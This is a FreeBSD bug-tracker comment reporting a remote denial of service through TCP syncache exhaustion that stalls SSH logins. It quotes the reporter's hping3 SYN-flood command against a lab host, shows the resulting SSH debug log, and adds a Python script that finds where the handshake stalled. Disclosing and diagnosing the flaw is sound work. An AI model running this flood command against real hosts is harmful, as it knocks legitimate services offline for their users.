[Bug 294623] Remote Denial of Service via TCP Syncache Exhaustion Global Syncache Attack with Severe Impact on SSH
Date: Sat, 18 Apr 2026 21:59:04 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=294623

--- Comment #2 from Igor Gabriel S. Souza <igor@bsdtrust.com> ---
In my tests, I ran "hping3 -S -p 22 --flood --rand-source -d 32 192.168.202.110" once and got an unusable terminal. When I ran two instances of "hping3 -S -p 22 --flood --rand-source -d 32 192.168.202.110" together, I obtained the following output:

[18:38:44.317] debug1: compat_banner: match: OpenSSH_10.0 FreeBSD-20250801 pat OpenSSH* compat 0x04000000
[18:38:44.318] debug1: Authenticating to 192.168.202.110:22 as 'igor'
[18:38:44.319] debug1: load_hostkeys: fopen /home/ig0r/.ssh/known_hosts2: No such file or directory
[18:38:44.320] debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
[18:38:44.321] debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
[18:38:44.322] debug1: SSH2_MSG_KEXINIT sent
[18:38:44.351] debug1: SSH2_MSG_KEXINIT received
[18:38:44.352] debug1: kex: algorithm: sntrup761x25519-sha512@openssh.com
[18:38:44.353] debug1: kex: host key algorithm: ssh-ed25519
[18:38:44.354] debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
[18:38:44.355] debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
[18:38:44.384] debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
[18:40:47.700] Connection closed by 192.168.202.110 port 22

-- 
You are receiving this mail because:
You are the assignee for the bug.
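
Added example, not part of the original comment or the FreeBSD project's code: a triage helper that reads timestamped SSH client debug output in the format posted above and reports where the handshake stalled. The embedded lines are copied from the comment; the 5-second threshold and the function names are assumptions chosen for illustration.

```python
import re
from datetime import datetime, timedelta

# Client debug lines copied from the comment above (timestamps as posted).
LOG = """\
[18:38:44.322] debug1: SSH2_MSG_KEXINIT sent
[18:38:44.351] debug1: SSH2_MSG_KEXINIT received
[18:38:44.355] debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
[18:38:44.384] debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
[18:40:47.700] Connection closed by 192.168.202.110 port 22
"""

# "[HH:MM:SS.mmm] " followed by an optional "debugN: " prefix and the message.
LINE = re.compile(r"^\[(\d{2}:\d{2}:\d{2}\.\d{3})\]\s+(?:debug\d: )?(.*)$")


def parse(log):
    """Return [(timestamp, message)] for each timestamped line; skip others."""
    events = []
    for raw in log.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%H:%M:%S.%f")
        # Timestamps carry no date: treat a backwards jump as midnight rollover.
        while events and ts < events[-1][0]:
            ts += timedelta(days=1)
        events.append((ts, m.group(2)))
    return events


def find_stalls(log, threshold=5.0):
    """Return (seconds, waiting_on, next_event) for each gap >= threshold.

    threshold is an assumed cut-off; on a LAN the whole key exchange
    normally completes in well under a second.
    """
    events = parse(log)
    stalls = []
    for (t0, before), (t1, after) in zip(events, events[1:]):
        gap = (t1 - t0).total_seconds()
        if gap >= threshold:
            stalls.append((round(gap, 3), before, after))
    return stalls


if __name__ == "__main__":
    for gap, before, after in find_stalls(LOG):
        print(f"{gap:.3f}s stall after '{before}' -> '{after}'")
```

On the posted log this isolates a single gap: the client has sent and received KEXINIT, then waits about two minutes for the key-exchange reply before the connection is closed.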